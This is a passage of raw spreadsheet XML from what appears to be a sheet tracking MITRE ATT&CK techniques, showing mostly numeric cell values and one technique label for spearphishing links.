        <v>0</v>
      </c>
      <c r="NW102" s="117">
        <v>0</v>
      </c>
      <c r="NX102" s="118">
        <v>0</v>
      </c>
      <c r="NY102" s="507">
        <v>0</v>
      </c>
      <c r="NZ102" s="119">
        <v>0</v>
      </c>
      <c r="OA102" s="119">
        <v>0</v>
      </c>
      <c r="OB102" s="119">
        <v>0</v>
      </c>
      <c r="OC102" s="120">
        <v>4530</v>
      </c>
      <c r="OD102" s="120">
        <v>260</v>
      </c>
      <c r="OE102" s="120">
        <v>2</v>
      </c>
      <c r="OF102" s="121">
        <v>1</v>
      </c>
      <c r="OG102" s="120">
        <v>259</v>
      </c>
      <c r="OH102" s="120">
        <v>259</v>
      </c>
      <c r="OI102" s="120">
        <v>259</v>
      </c>
      <c r="OJ102" s="120">
        <v>259</v>
      </c>
      <c r="OK102" s="383"/>
      <c r="OL102" s="120">
        <v>4530</v>
      </c>
      <c r="OM102" s="120">
        <v>4530</v>
      </c>
      <c r="ON102" s="120">
        <v>260</v>
      </c>
      <c r="OO102" s="120" t="s">
        <v>3897</v>
      </c>
      <c r="OP102" s="120">
        <v>2</v>
      </c>
      <c r="OQ102" s="464">
        <v>259</v>
      </c>
      <c r="OR102" s="120">
        <v>0</v>
      </c>
      <c r="OS102" s="120">
        <v>0</v>
      </c>
      <c r="OT102" s="120">
        <v>0</v>
      </c>
      <c r="OU102" s="120"/>
      <c r="OV102" s="120">
        <v>0</v>
      </c>
      <c r="OW102" s="464">
        <v>0</v>
      </c>
      <c r="OX102" s="120">
        <v>0</v>
      </c>
      <c r="OY102" s="120">
        <v>0</v>
      </c>
      <c r="OZ102" s="120">
        <v>0</v>
      </c>
      <c r="PA102" s="120"/>
      <c r="PB102" s="120">
        <v>0</v>
      </c>
      <c r="PC102" s="464">
        <v>0</v>
      </c>
      <c r="PD102" s="120">
        <v>0</v>
      </c>
      <c r="PE102" s="120">
        <v>0</v>
      </c>
      <c r="PF102" s="120">
        <v>0</v>
      </c>
      <c r="PG102" s="120"/>
      <c r="PH102" s="120">
        <v>0</v>
      </c>
      <c r="PI102" s="464">
        <v>0</v>
      </c>
      <c r="PJ102" s="120">
        <v>0</v>
      </c>
      <c r="PK102" s="120">
        <v>0</v>
      </c>
      <c r="PL102" s="120">
        <v>0</v>
      </c>
      <c r="PM102" s="120"/>
      <c r="PN102" s="120">
        <v>0</v>
      </c>
      <c r="PO102" s="464">
        <v>0</v>
      </c>
      <c r="PP102" s="120">
        <v>0</v>
      </c>
      <c r="PQ102" s="120">
        <v>0</v>
      </c>
      <c r="PR102" s="120">
        <v>0</v>
      </c>
      <c r="PS102" s="120"/>
      <c r="PT102" s="120">
        <v>0</v>
      </c>
      <c r="PU102" s="464">
        <v>0</v>
      </c>
      <c r="PV102" s="120">
        <v>0</v>
      </c>
      <c r="PW102" s="120">
        <v>0</v>
      </c>
      <c r="PX102" s="120">
        <v>0</v>
      </c>
      <c r="PY102" s="120"/>
      <c r="PZ102" s="120">
        <v>0</v>
      </c>
      <c r="QA102" s="464">
        <v>0</v>
      </c>
      <c r="QB102" s="120">
        <v>0</v>
      </c>
      <c r="QC102" s="120">
        <v>0</v>
      </c>
      <c r="QD102" s="120">
        <v>0</v>
      </c>
      <c r="QE102" s="120"/>
      <c r="QF102" s="120">
        <v>0</v>
      </c>
      <c r="QG102" s="464">
        <v>0</v>
      </c>
      <c r="QH102" s="120">
        <v>4530</v>
      </c>
      <c r="QI102" s="120">
        <v>4530</v>
      </c>
      <c r="QJ102" s="120">
        <v>259</v>
      </c>
      <c r="QK102" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL102" s="120">
        <v>1</v>
      </c>
      <c r="QM102" s="464">
        <v>259</v>
      </c>
      <c r="QN102" s="120">
        <v>0</v>
      </c>
      <c r="QO102" s="120">
        <v>0</v>
      </c>
      <c r="QP102" s="120">
        <v>0</v>
      </c>
      <c r="QQ102" s="120"/>
      <c r="QR102" s="120">
        <v>0</v>
      </c>
      <c r="QS102" s="464">
        <v>0</v>
      </c>
      <c r="QT102" s="184"/>
      <c r="QU102" s="184"/>
      <c r="QV102" s="184"/>
      <c r="QW102" s="184"/>
      <c r="QX102" s="184"/>
      <c r="QY102" s="184"/>
      <c r="QZ102" s="184"/>
      <c r="RA102" s="184"/>
      <c r="RB102" s="184"/>
      <c r="RC102" s="184"/>
      <c r="RD102" s="184"/>
      <c r="RE102" s="184"/>
      <c r="RF102" s="184"/>
      <c r="RG102" s="184"/>
      <c r="RH102" s="184"/>
      <c r="RI102" s="184"/>
      <c r="RJ102" s="184"/>
      <c r="RK102" s="184"/>
      <c r="RL102" s="184"/>
      <c r="RM102" s="184"/>
      <c r="RN102" s="184"/>
      <c r="RO102" s="184"/>
      <c r="RP102" s="184"/>
      <c r="RQ102" s="184"/>
      <c r="RR102" s="184"/>
      <c r="RS102" s="184"/>
      <c r="RT102" s="184"/>
      <c r="RU102" s="184"/>
      <c r="RV102" s="184"/>
      <c r="RW102" s="184"/>
      <c r="RX102" s="184"/>
      <c r="RY102" s="184"/>
      <c r="RZ102" s="184"/>
      <c r="SA102" s="184"/>
      <c r="SB102" s="184"/>
      <c r="SC102" s="184"/>
      <c r="SD102" s="184"/>
      <c r="SE102" s="184"/>
      <c r="SF102" s="184"/>
      <c r="SG102" s="184"/>
      <c r="SH102" s="184"/>
      <c r="SI102" s="184"/>
      <c r="SJ102" s="184"/>
      <c r="SK102" s="184"/>
      <c r="SL102" s="184"/>
      <c r="SM102" s="184"/>
      <c r="SN102" s="184"/>
      <c r="SO102" s="184"/>
      <c r="SP102" s="184"/>
      <c r="SQ102" s="184"/>
      <c r="SR102" s="184"/>
      <c r="SS102" s="184"/>
      <c r="ST102" s="184"/>
      <c r="SU102" s="184"/>
      <c r="SV102" s="184"/>
      <c r="SW102" s="184"/>
      <c r="SX102" s="184"/>
      <c r="SY102" s="184"/>
      <c r="SZ102" s="184"/>
      <c r="TA102" s="184"/>
      <c r="TB102" s="184"/>
      <c r="TC102" s="184"/>
      <c r="TD102" s="184"/>
      <c r="TE102" s="184"/>
      <c r="TF102" s="184"/>
      <c r="TG102" s="184"/>
      <c r="TH102" s="184"/>
      <c r="TI102" s="184"/>
      <c r="TJ102" s="184"/>
      <c r="TK102" s="184"/>
      <c r="TL102" s="184"/>
      <c r="TM102" s="184"/>
      <c r="TN102" s="184"/>
      <c r="TO102" s="184"/>
      <c r="TP102" s="184"/>
      <c r="TQ102" s="184"/>
      <c r="TR102" s="184"/>
      <c r="TS102" s="184"/>
      <c r="TT102" s="184"/>
      <c r="TU102" s="184"/>
      <c r="TV102" s="184"/>
      <c r="TW102" s="184"/>
      <c r="TX102" s="184"/>
      <c r="TY102" s="184"/>
      <c r="TZ102" s="184"/>
      <c r="UA102" s="184"/>
      <c r="UB102" s="184"/>
      <c r="UC102" s="184"/>
      <c r="UD102" s="184"/>
      <c r="UE102" s="184"/>
      <c r="UF102" s="184"/>
      <c r="UG102" s="184"/>
      <c r="UH102" s="184"/>
      <c r="UI102" s="184"/>
      <c r="UJ102" s="184"/>
      <c r="UK102" s="184"/>
      <c r="UL102" s="184"/>
      <c r="UM102" s="184"/>
      <c r="UN102" s="184"/>
      <c r="UO102" s="184"/>
      <c r="UP102" s="184"/>
      <c r="UQ102" s="184"/>
      <c r="UR102" s="184"/>
      <c r="US102" s="184"/>
      <c r="UT102" s="184"/>
      <c r="UU102" s="184"/>
      <c r="UV102" s="184"/>
      <c r="UW102" s="184"/>
      <c r="UX102" s="184"/>
      <c r="UY102" s="184"/>
      <c r="UZ102" s="184"/>
      <c r="VA102" s="184"/>
      <c r="VB102" s="184"/>
      <c r="VC102" s="184"/>
      <c r="VD102" s="184"/>
      <c r="VE102" s="184"/>
      <c r="VF102" s="184"/>
      <c r="VG102" s="184"/>
      <c r="VH102" s="184"/>
      <c r="VI102" s="184"/>
      <c r="VJ102" s="184"/>
      <c r="VK102" s="184"/>
      <c r="VL102" s="184"/>
      <c r="VM102" s="184"/>
      <c r="VN102" s="184"/>
      <c r="VO102" s="184"/>
      <c r="VP102" s="184"/>
      <c r="VQ102" s="184"/>
      <c r="VR102" s="184"/>
      <c r="VS102" s="184"/>
      <c r="VT102" s="184"/>
      <c r="VU102" s="184"/>
      <c r="VV102" s="184"/>
      <c r="VW102" s="184"/>
      <c r="VX102" s="184"/>
      <c r="VY102" s="184"/>
    </row>
    <row r="103" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A103" s="82" t="s">
        <v>153</v>
      </c>
      <c r="B103" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C103" s="83" t="s">
        <v>557</v>
      </c>
      <c r="D103" s="83" t="s">
        <v>160</v>
      </c>
      <c r="E103" s="83">
        <f t="shared" si="5"/>
        <v>69</v>
      </c>
      <c r="F103" s="83" t="s">
        <v>161</v>
      </c>
      <c r="G103" s="83" t="s">
        <v>1510</v>
      </c>
      <c r="H103" s="197" t="s">
        <v>1650</v>
      </c>
      <c r="I103" s="81" t="s">
        <v>1651</v>
      </c>
      <c r="J103" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K103" s="81" t="s">
        <v>1652</v>
      </c>
      <c r="L103" s="81" t="s">
        <v>1653</v>
      </c>
      <c r="M103" s="378" t="s">
        <v>262</v>
      </c>
      <c r="N103" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O103" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P103" s="91"/>
      <c r="Q103" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R103" s="92" t="s">
        <v>1654</v>
      </c>
      <c r="S103" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T103" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U103" s="94" t="s">
        <v>1516</v>
      </c>
      <c r="V103" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W103" s="96" t="s">
        <v>1655</v>
      </c>
      <c r="X103" s="97" t="s">
        <v>1656</v>
      </c>
      <c r="Y103" s="83" t="s">
        <v>1657</v>
      </c>
      <c r="Z103" s="98" t="s">
        <v>1658</v>
      </c>
      <c r="AA103" s="205" t="s">
        <v>745</v>
      </c>
      <c r="AB103" s="206" t="s">
        <v>745</v>
      </c>
      <c r="AC103" s="386" t="s">
        <v>745</v>
      </c>
      <c r="AD103" s="197"/>
      <c r="AE103" s="197"/>
      <c r="AF103" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG103" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH103" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI103" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ103" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK103" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL103" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM103" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN103" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO103" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP103" s="385" t="str">
        <f>M103&amp;"-frag"</f>
        <v>T1598.003-Spearphishing_Link-frag</v>
      </c>
      <c r="AQ103" s="358">
        <v>59</v>
      </c>
      <c r="AR103" s="100"/>
      <c r="AS103" s="100">
        <v>2</v>
      </c>
      <c r="AT103" s="100">
        <v>0</v>
      </c>
      <c r="AU103" s="100">
        <v>2</v>
      </c>
      <c r="AV103" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW103" s="100">
        <v>4</v>
      </c>
      <c r="AX103" s="100">
        <v>4</v>
      </c>
      <c r="AY103" s="100">
        <v>0</v>
      </c>
      <c r="AZ103" s="100">
        <v>4</v>
      </c>
      <c r="BA103" s="381" t="s">
        <v>4912</v>
      </c>
      <c r="BB103" s="101">
        <v>7</v>
      </c>
      <c r="BC103" s="102" t="s">
        <v>3990</v>
      </c>
      <c r="BD103" s="102">
        <v>5</v>
      </c>
      <c r="BE103" s="103" t="s">
        <v>3991</v>
      </c>
      <c r="BF103" s="103">
        <v>3</v>
      </c>
      <c r="BG103" s="104">
        <v>4</v>
      </c>
      <c r="BH103" s="105">
        <v>9</v>
      </c>
      <c r="BI103" s="106" t="s">
        <v>3992</v>
      </c>
      <c r="BJ103" s="497">
        <v>9</v>
      </c>
      <c r="BK103" s="107" t="s">
        <v>3993</v>
      </c>
      <c r="BL103" s="107">
        <v>3</v>
      </c>
      <c r="BM103" s="108">
        <v>5</v>
      </c>
      <c r="BN103" s="109">
        <v>16</v>
      </c>
      <c r="BO103" s="110" t="s">
        <v>2065</v>
      </c>
      <c r="BP103" s="501">
        <v>14</v>
      </c>
      <c r="BQ103" s="111" t="s">
        <v>2066</v>
      </c>
      <c r="BR103" s="111">
        <v>6</v>
      </c>
      <c r="BS103" s="112">
        <v>8</v>
      </c>
      <c r="BT103" s="113">
        <v>14</v>
      </c>
      <c r="BU103" s="114" t="s">
        <v>3994</v>
      </c>
      <c r="BV103" s="503">
        <v>11</v>
      </c>
      <c r="BW103" s="115" t="s">
        <v>3995</v>
      </c>
      <c r="BX103" s="115">
        <v>6</v>
      </c>
      <c r="BY103" s="116">
        <v>6</v>
      </c>
      <c r="BZ103" s="250">
        <v>34</v>
      </c>
      <c r="CA103" s="251" t="s">
        <v>3996</v>
      </c>
      <c r="CB103" s="505">
        <v>26</v>
      </c>
      <c r="CC103" s="252" t="s">
        <v>3997</v>
      </c>
      <c r="CD103" s="252">
        <v>10</v>
      </c>
      <c r="CE103" s="253">
        <v>15</v>
      </c>
      <c r="CF103" s="101">
        <v>48</v>
      </c>
      <c r="CG103" s="102" t="s">
        <v>3998</v>
      </c>
      <c r="CH103" s="102">
        <v>37</v>
      </c>
      <c r="CI103" s="103" t="s">
        <v>3999</v>
      </c>
      <c r="CJ103" s="103">
        <v>16</v>
      </c>
      <c r="CK103" s="104">
        <v>18</v>
      </c>
      <c r="CL103" s="105">
        <v>0</v>
      </c>
      <c r="CM103" s="106">
        <v>0</v>
      </c>
      <c r="CN103" s="497">
        <v>0</v>
      </c>
      <c r="CO103" s="107">
        <v>0</v>
      </c>
      <c r="CP103" s="107">
        <v>0</v>
      </c>
      <c r="CQ103" s="108">
        <v>0</v>
      </c>
      <c r="CR103" s="109">
        <v>2</v>
      </c>
      <c r="CS103" s="110" t="s">
        <v>1967</v>
      </c>
      <c r="CT103" s="501">
        <v>1</v>
      </c>
      <c r="CU103" s="111" t="s">
        <v>1968</v>
      </c>
      <c r="CV103" s="111">
        <v>1</v>
      </c>
      <c r="CW103" s="112">
        <v>1</v>
      </c>
      <c r="CX103" s="113">
        <v>18</v>
      </c>
      <c r="CY103" s="114" t="s">
        <v>2201</v>
      </c>
      <c r="CZ103" s="503">
        <v>15</v>
      </c>
      <c r="DA103" s="115" t="s">
        <v>2202</v>
      </c>
      <c r="DB103" s="115">
        <v>7</v>
      </c>
      <c r="DC103" s="116">
        <v>8</v>
      </c>
      <c r="DD103" s="101">
        <v>0</v>
      </c>
      <c r="DE103" s="102">
        <v>0</v>
      </c>
      <c r="DF103" s="102">
        <v>0</v>
      </c>
      <c r="DG103" s="103">
        <v>0</v>
      </c>
      <c r="DH103" s="103">
        <v>0</v>
      </c>
      <c r="DI103" s="104">
        <v>0</v>
      </c>
      <c r="DJ103" s="105">
        <v>1</v>
      </c>
      <c r="DK103" s="106" t="s">
        <v>4000</v>
      </c>
      <c r="DL103" s="497">
        <v>1</v>
      </c>
      <c r="DM103" s="107" t="s">
        <v>4001</v>
      </c>
      <c r="DN103" s="107">
        <v>1</v>
      </c>
      <c r="DO103" s="108">
        <v>1</v>
      </c>
      <c r="DP103" s="109">
        <v>1</v>
      </c>
      <c r="DQ103" s="110" t="s">
        <v>4000</v>
      </c>
      <c r="DR103" s="501">
        <v>1</v>
      </c>
      <c r="DS103" s="111" t="s">
        <v>4001</v>
      </c>
      <c r="DT103" s="111">
        <v>1</v>
      </c>
      <c r="DU103" s="112">
        <v>1</v>
      </c>
      <c r="DV103" s="113">
        <v>5</v>
      </c>
      <c r="DW103" s="114" t="s">
        <v>4002</v>
      </c>
      <c r="DX103" s="503">
        <v>5</v>
      </c>
      <c r="DY103" s="115" t="s">
        <v>4003</v>
      </c>
      <c r="DZ103" s="115">
        <v>2</v>
      </c>
      <c r="EA103" s="116">
        <v>5</v>
      </c>
      <c r="EB103" s="250">
        <v>1</v>
      </c>
      <c r="EC103" s="251" t="s">
        <v>4000</v>
      </c>
      <c r="ED103" s="505">
        <v>1</v>
      </c>
      <c r="EE103" s="252" t="s">
        <v>4001</v>
      </c>
      <c r="EF103" s="252">
        <v>1</v>
      </c>
      <c r="EG103" s="253">
        <v>1</v>
      </c>
      <c r="EH103" s="101">
        <v>6</v>
      </c>
      <c r="EI103" s="102" t="s">
        <v>4004</v>
      </c>
      <c r="EJ103" s="102">
        <v>6</v>
      </c>
      <c r="EK103" s="103" t="s">
        <v>4005</v>
      </c>
      <c r="EL103" s="103">
        <v>3</v>
      </c>
      <c r="EM103" s="104">
        <v>5</v>
      </c>
      <c r="EN103" s="105">
        <v>0</v>
      </c>
      <c r="EO103" s="106">
        <v>0</v>
      </c>
      <c r="EP103" s="497">
        <v>0</v>
      </c>
      <c r="EQ103" s="107">
        <v>0</v>
      </c>
      <c r="ER103" s="107">
        <v>0</v>
      </c>
      <c r="ES103" s="108">
        <v>0</v>
      </c>
      <c r="ET103" s="109">
        <v>0</v>
      </c>
      <c r="EU103" s="110">
        <v>0</v>
      </c>
      <c r="EV103" s="501">
        <v>0</v>
      </c>
      <c r="EW103" s="111">
        <v>0</v>
      </c>
      <c r="EX103" s="111">
        <v>0</v>
      </c>
      <c r="EY103" s="112">
        <v>0</v>
      </c>
      <c r="EZ103" s="113">
        <v>1</v>
      </c>
      <c r="FA103" s="114" t="s">
        <v>4000</v>
      </c>
      <c r="FB103" s="503">
        <v>1</v>
      </c>
      <c r="FC103" s="115" t="s">
        <v>4001</v>
      </c>
      <c r="FD103" s="115">
        <v>1</v>
      </c>
      <c r="FE103" s="116">
        <v>1</v>
      </c>
      <c r="FF103" s="101">
        <v>3</v>
      </c>
      <c r="FG103" s="102" t="s">
        <v>1793</v>
      </c>
      <c r="FH103" s="102">
        <v>1</v>
      </c>
      <c r="FI103" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ103" s="103">
        <v>1</v>
      </c>
      <c r="FK103" s="104">
        <v>1</v>
      </c>
      <c r="FL103" s="105">
        <v>0</v>
      </c>
      <c r="FM103" s="106">
        <v>0</v>
      </c>
      <c r="FN103" s="497">
        <v>0</v>
      </c>
      <c r="FO103" s="107">
        <v>0</v>
      </c>
      <c r="FP103" s="107">
        <v>0</v>
      </c>
      <c r="FQ103" s="108">
        <v>0</v>
      </c>
      <c r="FR103" s="109">
        <v>3</v>
      </c>
      <c r="FS103" s="110" t="s">
        <v>1793</v>
      </c>
      <c r="FT103" s="501">
        <v>1</v>
      </c>
      <c r="FU103" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV103" s="111">
        <v>1</v>
      </c>
      <c r="FW103" s="112">
        <v>1</v>
      </c>
      <c r="FX103" s="113">
        <v>5</v>
      </c>
      <c r="FY103" s="114" t="s">
        <v>4006</v>
      </c>
      <c r="FZ103" s="503">
        <v>2</v>
      </c>
      <c r="GA103" s="115" t="s">
        <v>4007</v>
      </c>
      <c r="GB103" s="115">
        <v>2</v>
      </c>
      <c r="GC103" s="116">
        <v>2</v>
      </c>
      <c r="GD103" s="250">
        <v>10</v>
      </c>
      <c r="GE103" s="251" t="s">
        <v>4008</v>
      </c>
      <c r="GF103" s="505">
        <v>6</v>
      </c>
      <c r="GG103" s="252" t="s">
        <v>4009</v>
      </c>
      <c r="GH103" s="252">
        <v>3</v>
      </c>
      <c r="GI103" s="253">
        <v>3</v>
      </c>
      <c r="GJ103" s="101">
        <v>15</v>
      </c>
      <c r="GK103" s="102" t="s">
        <v>4010</v>
      </c>
      <c r="GL103" s="102">
        <v>8</v>
      </c>
      <c r="GM103" s="103" t="s">
        <v>4011</v>
      </c>
      <c r="GN103" s="103">
        <v>5</v>
      </c>
      <c r="GO103" s="104">
        <v>5</v>
      </c>
      <c r="GP103" s="105">
        <v>0</v>
      </c>
      <c r="GQ103" s="106">
        <v>0</v>
      </c>
      <c r="GR103" s="497">
        <v>0</v>
      </c>
      <c r="GS103" s="107">
        <v>0</v>
      </c>
      <c r="GT103" s="107">
        <v>0</v>
      </c>
      <c r="GU103" s="108">
        <v>0</v>
      </c>
      <c r="GV103" s="109">
        <v>2</v>
      </c>
      <c r="GW103" s="110" t="s">
        <v>1967</v>
      </c>
      <c r="GX103" s="501">
        <v>1</v>
      </c>
      <c r="GY103" s="111" t="s">
        <v>1968</v>
      </c>
      <c r="GZ103" s="111">
        <v>1</v>
      </c>
      <c r="HA103" s="112">
        <v>1</v>
      </c>
      <c r="HB103" s="113">
        <v>5</v>
      </c>
      <c r="HC103" s="114" t="s">
        <v>4006</v>
      </c>
      <c r="HD103" s="503">
        <v>2</v>
      </c>
      <c r="HE103" s="115" t="s">
        <v>4007</v>
      </c>
      <c r="HF103" s="115">
        <v>2</v>
      </c>
      <c r="HG103" s="116">
        <v>2</v>
      </c>
      <c r="HH103" s="101">
        <v>4</v>
      </c>
      <c r="HI103" s="102" t="s">
        <v>4012</v>
      </c>
      <c r="HJ103" s="102">
        <v>4</v>
      </c>
      <c r="HK103" s="103" t="s">
        <v>4013</v>
      </c>
      <c r="HL103" s="103">
        <v>2</v>
      </c>
      <c r="HM103" s="104">
        <v>4</v>
      </c>
      <c r="HN103" s="105">
        <v>8</v>
      </c>
      <c r="HO103" s="106" t="s">
        <v>4014</v>
      </c>
      <c r="HP103" s="497">
        <v>8</v>
      </c>
      <c r="HQ103" s="107" t="s">
        <v>3745</v>
      </c>
      <c r="HR103" s="107">
        <v>2</v>
      </c>
      <c r="HS103" s="108">
        <v>4</v>
      </c>
      <c r="HT103" s="109">
        <v>12</v>
      </c>
      <c r="HU103" s="110" t="s">
        <v>4015</v>
      </c>
      <c r="HV103" s="501">
        <v>12</v>
      </c>
      <c r="HW103" s="111" t="s">
        <v>4016</v>
      </c>
      <c r="HX103" s="111">
        <v>4</v>
      </c>
      <c r="HY103" s="112">
        <v>8</v>
      </c>
      <c r="HZ103" s="113">
        <v>4</v>
      </c>
      <c r="IA103" s="114" t="s">
        <v>4012</v>
      </c>
      <c r="IB103" s="503">
        <v>4</v>
      </c>
      <c r="IC103" s="115" t="s">
        <v>4013</v>
      </c>
      <c r="ID103" s="115">
        <v>2</v>
      </c>
      <c r="IE103" s="116">
        <v>4</v>
      </c>
      <c r="IF103" s="250">
        <v>23</v>
      </c>
      <c r="IG103" s="251" t="s">
        <v>4017</v>
      </c>
      <c r="IH103" s="505">
        <v>19</v>
      </c>
      <c r="II103" s="252" t="s">
        <v>3749</v>
      </c>
      <c r="IJ103" s="252">
        <v>6</v>
      </c>
      <c r="IK103" s="253">
        <v>12</v>
      </c>
      <c r="IL103" s="101">
        <v>27</v>
      </c>
      <c r="IM103" s="102" t="s">
        <v>4018</v>
      </c>
      <c r="IN103" s="102">
        <v>23</v>
      </c>
      <c r="IO103" s="103" t="s">
        <v>4019</v>
      </c>
      <c r="IP103" s="103">
        <v>8</v>
      </c>
      <c r="IQ103" s="104">
        <v>16</v>
      </c>
      <c r="IR103" s="105">
        <v>0</v>
      </c>
      <c r="IS103" s="106">
        <v>0</v>
      </c>
      <c r="IT103" s="497">
        <v>0</v>
      </c>
      <c r="IU103" s="107">
        <v>0</v>
      </c>
      <c r="IV103" s="107">
        <v>0</v>
      </c>
      <c r="IW103" s="108">
        <v>0</v>
      </c>
      <c r="IX103" s="109">
        <v>0</v>
      </c>
      <c r="IY103" s="110">
        <v>0</v>
      </c>
      <c r="IZ103" s="501">
        <v>0</v>
      </c>
      <c r="JA103" s="111">
        <v>0</v>
      </c>
      <c r="JB103" s="111">
        <v>0</v>
      </c>
      <c r="JC103" s="112">
        <v>0</v>
      </c>
      <c r="JD103" s="113">
        <v>12</v>
      </c>
      <c r="JE103" s="114" t="s">
        <v>4015</v>
      </c>
      <c r="JF103" s="503">
        <v>12</v>
      </c>
      <c r="JG103" s="115" t="s">
        <v>4016</v>
      </c>
      <c r="JH103" s="115">
        <v>4</v>
      </c>
      <c r="JI103" s="116">
        <v>8</v>
      </c>
      <c r="JJ103" s="101">
        <v>0</v>
      </c>
      <c r="JK103" s="102">
        <v>0</v>
      </c>
      <c r="JL103" s="102">
        <v>0</v>
      </c>
      <c r="JM103" s="103">
        <v>0</v>
      </c>
      <c r="JN103" s="103">
        <v>0</v>
      </c>
      <c r="JO103" s="104">
        <v>0</v>
      </c>
      <c r="JP103" s="105">
        <v>0</v>
      </c>
      <c r="JQ103" s="106">
        <v>0</v>
      </c>
      <c r="JR103" s="497">
        <v>0</v>
      </c>
      <c r="JS103" s="107">
        <v>0</v>
      </c>
      <c r="JT103" s="107">
        <v>0</v>
      </c>
      <c r="JU103" s="108">
        <v>0</v>
      </c>
      <c r="JV103" s="109">
        <v>0</v>
      </c>
      <c r="JW103" s="110">
        <v>0</v>
      </c>
      <c r="JX103" s="501">
        <v>0</v>
      </c>
      <c r="JY103" s="111">
        <v>0</v>
      </c>
      <c r="JZ103" s="111">
        <v>0</v>
      </c>
      <c r="KA103" s="112">
        <v>0</v>
      </c>
      <c r="KB103" s="113">
        <v>0</v>
      </c>
      <c r="KC103" s="114">
        <v>0</v>
      </c>
      <c r="KD103" s="503">
        <v>0</v>
      </c>
      <c r="KE103" s="115">
        <v>0</v>
      </c>
      <c r="KF103" s="115">
        <v>0</v>
      </c>
      <c r="KG103" s="116">
        <v>0</v>
      </c>
      <c r="KH103" s="250">
        <v>0</v>
      </c>
      <c r="KI103" s="251">
        <v>0</v>
      </c>
      <c r="KJ103" s="505">
        <v>0</v>
      </c>
      <c r="KK103" s="252">
        <v>0</v>
      </c>
      <c r="KL103" s="252">
        <v>0</v>
      </c>
      <c r="KM103" s="253">
        <v>0</v>
      </c>
      <c r="KN103" s="101">
        <v>0</v>
      </c>
      <c r="KO103" s="102">
        <v>0</v>
      </c>
      <c r="KP103" s="102">
        <v>0</v>
      </c>
      <c r="KQ103" s="103">
        <v>0</v>
      </c>
      <c r="KR103" s="103">
        <v>0</v>
      </c>
      <c r="KS103" s="104">
        <v>0</v>
      </c>
      <c r="KT103" s="105">
        <v>0</v>
      </c>
      <c r="KU103" s="106">
        <v>0</v>
      </c>
      <c r="KV103" s="497">
        <v>0</v>
      </c>
      <c r="KW103" s="107">
        <v>0</v>
      </c>
      <c r="KX103" s="107">
        <v>0</v>
      </c>
      <c r="KY103" s="108">
        <v>0</v>
      </c>
      <c r="KZ103" s="109">
        <v>0</v>
      </c>
      <c r="LA103" s="110">
        <v>0</v>
      </c>
      <c r="LB103" s="501">
        <v>0</v>
      </c>
      <c r="LC103" s="111">
        <v>0</v>
      </c>
      <c r="LD103" s="111">
        <v>0</v>
      </c>
      <c r="LE103" s="112">
        <v>0</v>
      </c>
      <c r="LF103" s="113">
        <v>0</v>
      </c>
      <c r="LG103" s="114">
        <v>0</v>
      </c>
      <c r="LH103" s="503">
        <v>0</v>
      </c>
      <c r="LI103" s="115">
        <v>0</v>
      </c>
      <c r="LJ103" s="115">
        <v>0</v>
      </c>
      <c r="LK103" s="116">
        <v>0</v>
      </c>
      <c r="LL103" s="117">
        <v>64</v>
      </c>
      <c r="LM103" s="507">
        <v>64</v>
      </c>
      <c r="LN103" s="119">
        <v>0</v>
      </c>
      <c r="LO103" s="119">
        <v>7</v>
      </c>
      <c r="LP103" s="119">
        <v>59</v>
      </c>
      <c r="LQ103" s="119">
        <v>0</v>
      </c>
      <c r="LR103" s="119">
        <v>59</v>
      </c>
      <c r="LS103" s="119">
        <v>59</v>
      </c>
      <c r="LT103" s="382"/>
      <c r="LU103" s="117">
        <v>0</v>
      </c>
      <c r="LV103" s="118">
        <v>0</v>
      </c>
      <c r="LW103" s="507">
        <v>0</v>
      </c>
      <c r="LX103" s="119">
        <v>0</v>
      </c>
      <c r="LY103" s="119">
        <v>0</v>
      </c>
      <c r="LZ103" s="119">
        <v>0</v>
      </c>
      <c r="MA103" s="117">
        <v>0</v>
      </c>
      <c r="MB103" s="118">
        <v>0</v>
      </c>
      <c r="MC103" s="507">
        <v>0</v>
      </c>
      <c r="MD103" s="119">
        <v>0</v>
      </c>
      <c r="ME103" s="119">
        <v>0</v>
      </c>
      <c r="MF103" s="119">
        <v>0</v>
      </c>
      <c r="MG103" s="117">
        <v>0</v>
      </c>
      <c r="MH103" s="118">
        <v>0</v>
      </c>
      <c r="MI103" s="507">
        <v>0</v>
      </c>
      <c r="MJ103" s="119">
        <v>0</v>
      </c>
      <c r="MK103" s="119">
        <v>0</v>
      </c>
      <c r="ML103" s="119">
        <v>0</v>
      </c>
      <c r="MM103" s="117">
        <v>0</v>
      </c>
      <c r="MN103" s="118">
        <v>0</v>
      </c>
      <c r="MO103" s="507">
        <v>0</v>
      </c>
      <c r="MP103" s="119">
        <v>0</v>
      </c>
      <c r="MQ103" s="119">
        <v>0</v>
      </c>
      <c r="MR103" s="119">
        <v>0</v>
      </c>
      <c r="MS103" s="117">
        <v>0</v>
      </c>
      <c r="MT103" s="118">
        <v>0</v>
      </c>
      <c r="MU103" s="507">
        <v>0</v>
      </c>
      <c r="MV103" s="119">
        <v>0</v>
      </c>
      <c r="MW103" s="119">
        <v>0</v>
      </c>
      <c r="MX103" s="119">
        <v>0</v>
      </c>
      <c r="MY103" s="117">
        <v>0</v>
      </c>
      <c r="MZ103" s="118">
        <v>0</v>
      </c>
      <c r="NA103" s="507">
        <v>0</v>
      </c>
      <c r="NB103" s="119">
        <v>0</v>
      </c>
